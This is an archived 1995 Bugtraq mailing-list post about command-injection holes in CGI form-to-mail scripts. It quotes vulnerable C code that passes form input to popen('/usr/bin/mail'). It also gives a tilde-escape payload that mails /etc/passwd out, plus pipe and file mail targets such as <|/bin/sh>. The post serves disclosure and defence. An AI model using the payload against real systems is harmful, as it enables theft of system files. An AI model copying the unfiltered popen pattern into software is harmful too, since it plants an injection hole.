Bugtraq mailing list archives
More holes, was: Re: SECURITY HOLE: FormMail
From: ivo () nijenrode nl (Ivo)
Date: Sat, 5 Aug 1995 13:53:21 +0200
In message <199508042344.QAA20408 () Csli Stanford EDU> Christian Wettergren write s
| Just to be helpful, the way to do it more safely, without massive | need for checking is to build a complete mail message, including | header, and hand that to "sendmail -t" which then reads the recipient | information out of the constructed header. [Sendmail should of course | be an invocation of smail or pp, not the BSD program of that name, | given the history of problems that has had] I suspect this still wont take care of emails to pipes or files, i.e <|/bin/sh> or </.rhosts>, it is a legitimate, albeit unexpected, mail-command going to sendmail. So unless these two mode are totally stripped out of the sendmail, there will exist a vulnerability there, wont it?
I've written an email-cgi package myself, and for this package I've used a simple smtp client written by Wietse Venema. I've been familiar with bugs like tilde-escapes etc. for a while, and this smtp client does not have any fancy switches, escapes, options etc. Ok, of course you should not use popen() or system() (C) or open/syste, (perl) (at least not withouth filtering out '|;' etc), but fork combined with execve works fine and secure. You can find smtp.c in the wwwutils package at ftp://ftp.win.tue.nl/pub/infosystems/www/wwwutils.tar.gz or directly at ftp://ftp.nijenrode.nl/pub/people/ivo/smtp.c Also (perhaps someone already reported this), Thomas Boutell's Email Handler (http://siva.cshl.org/email/index.html) seems to suffer from this problem. I've reported this a very long time ago to him, but it seems he hasn't fixed it. Thomas Boutell is maintainer of the WWW-FAQ, and he refers to his handler in it, so it *might* be that a lot of people are using it! Here's a piece of code from email.c: sprintf(buf, "/usr/bin/mail %s", entries[recipientid].val); out = popen(buf, "w"); fprintf(out, "Subject: %s\n", entries[subjectid].val); fprintf(out, "Reply-To: %s\n", entries[emailid].val); fprintf(out, "Supposedly-From: %s\n", entries[nameid].val); fprintf(out, "[This message was sent through the www-email gateway.]\n"); fprintf(out, "--\n"); fprintf(out, "%s\n", entries[contentid].val); pclose(out); The popen() here doesn't seem to be insecure, the cgi first checks the recipient against a list of users which are defined in a local configfile (which location is hardcoded into the source). However, this program directly sends the entire message to /usr/bin/mail, including ~-escapes. I've been able to send myself, using this program, a copy of the passwd file by simply typing ~!/bin/mail ivo () nijenrode nl < /etc/passwd in the message-entry of the form. This was on AIX 2.3. Happy hacking, Ivo ------------------------------------------------------------------------ Name: Ivo van der Wijk | It won't give up it wants me dead Internet: ivo () nijenrode nl | this goddamn noise inside my head Aka: www () nijenrode nl | IRC: VladDrac | |\|||/| URL: http://www.nijenrode.nl/~ivo ------------------------------------------------------------------------
Current thread:
- followup: local mail delivery, (continued)
- followup: local mail delivery der Mouse (Aug 03)
- Re: SECURITY HOLE: FormMail Christian Wettergren (Aug 03)
- PERL (was: Re: SECURITY HOLE: FormMail) VaX#n8 (Aug 07)
- Re: PERL (was: Re: SECURITY HOLE: FormMail) Philip Guenther (Aug 07)
- Guidelines for cgi-bin scripts Lee Silverman (Aug 08)
- Re: Guidelines for cgi-bin scripts Dave Andersen (Aug 08)
- Re: Guidelines for cgi-bin scripts Christian Wettergren (Aug 09)
- Re: SECURITY HOLE: FormMail Andrew Macpherson (Aug 03)
- Re: SECURITY HOLE: FormMail Christian Wettergren (Aug 04)
- Re: SECURITY HOLE: FormMail Neil Woods (Aug 05)
- More holes, was: Re: SECURITY HOLE: FormMail Ivo (Aug 05)
- My email handler, ~ escapes, etc. Tom (Aug 05)
- Simple CGI email handler, fixed Tom (Aug 05)
- Re: SECURITY HOLE: FormMail Christian Wettergren (Aug 04)
- Re: SECURITY HOLE: FormMail Andrew Macpherson (Aug 04)
- Re: SECURITY HOLE: FormMail Jukka Ukkonen (Aug 07)